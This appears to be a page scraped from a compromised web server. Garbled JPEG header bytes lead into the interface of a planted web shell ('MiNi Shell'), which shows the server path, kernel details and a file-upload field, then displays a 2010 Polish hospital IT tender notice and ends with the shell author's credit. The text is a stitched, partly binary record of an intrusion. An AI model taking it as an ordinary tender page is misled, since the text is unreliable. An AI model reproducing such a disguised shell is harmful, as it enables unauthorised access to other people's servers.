JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100318/60183-N-2010.html

<p class="kh_header"><b>Olsztyn: Dostawa i montaż sprzętu informatycznego i oprogramowania w ramach realizacji projektu pn. Poprawa jakości i dostepnosci usług medycznych poprzez kompleksową informatyzację SPZGiChPw Olsztynie</b><br>
<b>Numer ogłoszenia: 60183 - 2010; data zamieszczenia: 18.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc , ul. Jagiellońska 78, 10-357 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5322966, faks 089 5322979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pulmonologia.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż sprzętu informatycznego i oprogramowania w ramach realizacji projektu pn. Poprawa jakości i dostepnosci usług medycznych poprzez kompleksową informatyzację SPZGiChPw Olsztynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest dostawa  i montaż sprzętu informatycznego i oprogramowania w ramach realizacji projektu pn. Poprawa jakości i dostępności usług medycznych poprzez kompleksową informatyzacje SPZGiChP w Olsztynie.
2.  Zakres zamówienia obejmuje budowę  zintegrowanej platformy dla gromadzenia i analizy informacji medycznych, diagnostycznych  i administracyjnych, tzw. Zintegrowanego Systemu Informacyjnego (zwanego dalej ZSI) dla Samodzielnego Zespołu Gruźlicy i Chorób Płuc w Olsztynie, i składa się                     z następujących części:

2.1  Dostawa i wdrożenie Szpitalnego Systemu Informacyjnego, obejmująca: 

a) dostawę, instalację, migrację danych, konfigurację, szkolenie użytkowników i uruchomienie oprogramowania typu HIS (ang. Hospital Information System, część biała) wraz z niezbędnym dla jego funkcjonowania sprzętem komputerowym (serwery, komputery, terminale) w konfiguracji zapewniającej jego efektywną pracę i krótki czas reakcji. Dostarczony system HIS musi zostać zintegrowany  z istniejącym systemem typu RIS i PACS firmy Fuji Film, tak by wspólnie dawały spójną, aktualną i obiektywną informację w obrębie całego Systemu. W przypadku wszelkich połączeń pomiędzy aplikacjami używane będą rozwiązania zgodne z międzynarodowymi standardami tj. HL7, DICOM, CCOW, IHE itp., w przypadku braku możliwości zastosowania wymienionych standardów lub zbyt wysokich kosztów implementacji rozpatrywane będą rozwiązania dedykowane. W celu redukcji kosztów użytkowania jak i wykorzystania istniejącej bazy sprzętowej preferowana będzie wielowarstwowa architektura aplikacji (ang. n-tier architecture) z użyciem tzw. cienkiego klienta (ang. thin client) np. przeglądarki internetowej, z wykluczeniem interfejsów tekstowych, 
b)   zagwarantowanie pełnej migracji danych z aktualnie eksploatowanych systemów.
c)   program ITM ruch chorych firmy ITM software house Olsztyn. 
      
2.2 Dostawa i wdrożenie Administracyjnego Systemu Informatycznego, obejmująca:

a) dostawę, instalację, migrację danych, konfigurację, szkolenie użytkowników i uruchomienie oprogramowania klasy ERP  (ang.  Enterprise Resource Planning - Zarządzanie Zasobami Przedsiębiorstwa, część szara) wraz z niezbędnym dla jego funkcjonowania sprzętem komputerowym (serwery, komputery, terminale) w konfiguracji zapewniającej jego efektywną pracę    i krótki czas reakcji. Dostarczony system musi zostać zintegrowany z systemem HIS, tak, by wspólnie dawały spójną, aktualną i obiektywną informację pozwalającą na planowanie, koordynowanie i kontrolowanie procesów ekonomicznych. W przypadku wszelkich połączeń pomiędzy aplikacjami ZSI używane będą rozwiązania zgodne z międzynarodowymi standardami tj. HL7, DICOM, CCOW, IHE itp., w przypadku braku możliwości zastosowania wymienionych standardów lub zbyt wysokich kosztów implementacji rozpatrywane będą rozwiązania dedykowane. Jak w pkt 2.1, w celu redukcji kosztów użytkowania jak i wykorzystania istniejącej bazy sprzętowej preferowana będzie wielowarstwowa architektura aplikacji (ang. n-tier architecture)                z użyciem tzw. cienkiego klienta (ang. thin client) np. przeglądarki internetowej, z wykluczeniem interfejsów tekstowych.
b)   zagwarantowanie pełnej migracji danych z aktualnie eksploatowanych systemów,
      - finanse Księgowość firmy Gemini Junox (dane do przeniesienia w formacie xls), m.in.:
 Bilans otwarcia
 Kartoteki kontrahentów
 Plan kont
 Ośrodki kosztów
 Rozrachunki z kontrahentami i pracownikami.
2.3  Dostawa i wdrożenie Laboratoryjnego Systemu Informacyjnego, obejmująca: 

a)  obejmuje dostawę, instalację, konfigurację, szkolenie użytkowników i uruchomienie specjalistycznego oprogramowania typu LIS (ang. Laboratory Information System). Celem jest wdrożenie jednolitej platformy informatycznej dla laboratorium.
b) System Laboratoryjny musi być w pełni zintegrowany z ZSI, umożliwiając transparentną dla użytkowników wymianę danych w zakresie zlecania badań i odbierania wyników w ramach jednego interfejsu. Wszystkie urządzenia i analizatory, które posiadają zdolność jedno i dwukierunkowej komunikacji z LIS, muszą zostać podpięte i skonfigurowane, celem uzyskania pełnej automatyki diagnostycznej, zgodnej z przyjętymi międzynarodowymi standardami.

2.4 Dostawa sprzętu informatycznego w związku z wdrożeniem ZSI, obejmująca:

a)  dostawę i uruchomienie rozwiązania sprzętowego dla ZSI, w zakresie osprzętu serwerowego jak i sieci LAN, jej elementów aktywnych i pasywnych, z włączeniem w obecną topologię,
b)  urządzenia obejmują serwery główne i zapasowe baz danych do HIS, Administracji i LIS, macierze dyskowe do centralnej bazy danych, serwery terminalowe do obsługi cienkich klientów wraz                      z terminalami (50 szt.), napędy taśmowe, przełączniki, macierz, stacje robocze (20szt.), laptopy               (5 szt.), router, ups-y, monitory LCD (60szt.), monitory specjalistyczne (10szt.)
c)   oprogramowanie systemowe wymienionych w pkt b) sprzętów informatycznych, w tym pakiet biurowy MS Office - 25 licencji, oprogramowanie antywirusowe - 50 licencji,
d)  oprogramowanie dla części medycznej tzw. części białej - łącznie 59 licencji (nieograniczona ilość użytkowników), w tym:
- oddziały, izba przyjęć, rtg, por. specjalistyczna itp. - 44 licencje,
- apteka, apteki oddziałowe - 9 licencji,
- laboratorium - 6 licencji.
e) oprogramowanie dla części administracyjnej - łącznie 11 licencji (nieograniczona ilość użytkowników), w tym: 
       - kadry - 2 licencje,
- księgowość płace - 5 licencji,
- dział obsługi szpitala - 3 licencje,
- zamówienia publiczne - 1 licencja..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.13.00-4, 30.21.15.00-6, 30.21.30.00-5, 30.21.31.00-6, 30.21.40.00-2, 30.23.11.00-8, 30.23.13.00-0, 51.61.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zgodnie z art. 45 ust. 2 ustawy Zamawiający wymaga  wniesienia wadium w wysokości: 8 000,00 zł
     (słownie: osiem tysięcy złotych)
2.  Wadium może być wniesione w następujących formach:
a)  pieniądzu - przelewem na rachunek bankowy: Bank Millennium S.A   77   1160   2202  0000  0000  6193  7410 
b)  poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c)  gwarancjach bankowych,
     d)  gwarancjach ubezpieczeniowych,                                                                                                                     e)  poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b ust. 5 pkt 2   ustawy z dnia                9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 roku, Nr 42, poz. 275). 
3. Wadium wniesione w formie innej niż pieniężna winno być przesłane na adres Zespołu do dnia 31.03.2010 roku do  godz.  11:00,  w  osobnej  kopercie  z nazwą Wykonawcy, z dopiskiem WADIUM DOSTAWA I MONTAŻ SPRZĘTU INFORMATYCZNEGO I OPROGRAMOWANIA(dołączyć  do oferty dowód przelewu, bądź kopię w przypadku innej niż pieniężna formy wadium).
4.  Zamawiający zwraca niezwłocznie  wadium w przypadkach określonych w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Osoba fizyczna prowadząca działalność gospodarczą winna złożyć wypełnione i podpisane  oświadczenie dotyczące art. 24 ust. 1 pkt  2 stanowiące Załącznik Nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych w sposób należyty w okresie 3 lat przed dniem wszczęcia postępowania                            o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zamówień odpowiadających swoim rodzajem i wartością przedmiotowi stanowiącemu przedmiot niniejszego postępowania oraz załączenie dokumentów potwierdzających, że zamówienia te zostały wykonane należycie (np. referencje) - Załącznik Nr 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dokumenty potwierdzające, iż oferowany sprzęt informatyczny  zawiera elementy fabrycznie nowe wyprodukowane zgodnie z normą ISO-9001, ISO-14001 oraz posiada niezbędne certyfikaty, w tym ceryfikat CE.
12. Dokumenty dotyczące stacji roboczych i terminali:
      a)   certyfikat ISO9001 dla producenta sprzętu, 
      b)   certyfikat Microsoft dla oferowanych modeli komputerów, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Vista (dołączyć wydruk ze strony Microsoft WHCL),
      c)   oświadczenie producenta wraz z raportem badawczym wystawionym przez niezależna akredytowana jednostkę, potwierdzające głośność jednostki centralnej mierzona zgodnie z norma ISO 7779 oraz wykazana zgodnie z norma ISO 9296 w pozycji obserwatora w trybie pracy dysku twardego (WORK) wynoszącą maksymalnie 21dB,  
      d)   deklaracja zgodności CE, 
      e)   potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta jednostki (wg wytycznych Krajowej Agencji Poszanowania Energii S.A., zawartych                          w dokumencie Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energie możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych, pkt 3.4.2.1; dokument z grudnia 2006), w szczególności zgodności              z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych                o masie powyżej 25 gram, 
      f)    dokumenty potwierdzające spełnianie wymogów  normy Energy Star 4.0,
      g)  wymagany wpis dotyczący oferowanego komputera w  internetowym katalogu http:www.eu-energystar.org - dopuszcza się wydruk ze strony internetowej, 
      h)   certyfikat EPEAT na poziomie GOLD,
      i) wymagany wpis dotyczący oferowanego komputera w  internetowym katalogu http:www.epeat.net - dopuszcza się wydruk ze strony internetowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jw.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego wystawione nie wcześniej niż                3 miesiące przed upływem terminu składania ofert, potwierdzające, że Wykonawca nie zalega                   z opłacaniem podatków, opłat lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
7. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert, potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatnosci lub wstrzymanie w całości decyzji właściwego organu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Opis wdrożenia systemu z wyszczególnieniem proponowanego przez Wykonawcę sprzętu informatycznego, systemów operacyjnych oraz rozwiązań technologicznych.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pulmonologia.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Budynek administracji, pok. 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2010 godzina 11:00, miejsce: Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-357 Olsztyn
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Poprawa jakości                     i dostępności usług medycznych poprzez  kompleksową informatyzację SPZGiChP   w Olsztynie
Nr WND-RPWM.07.02.01-28-001/09.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com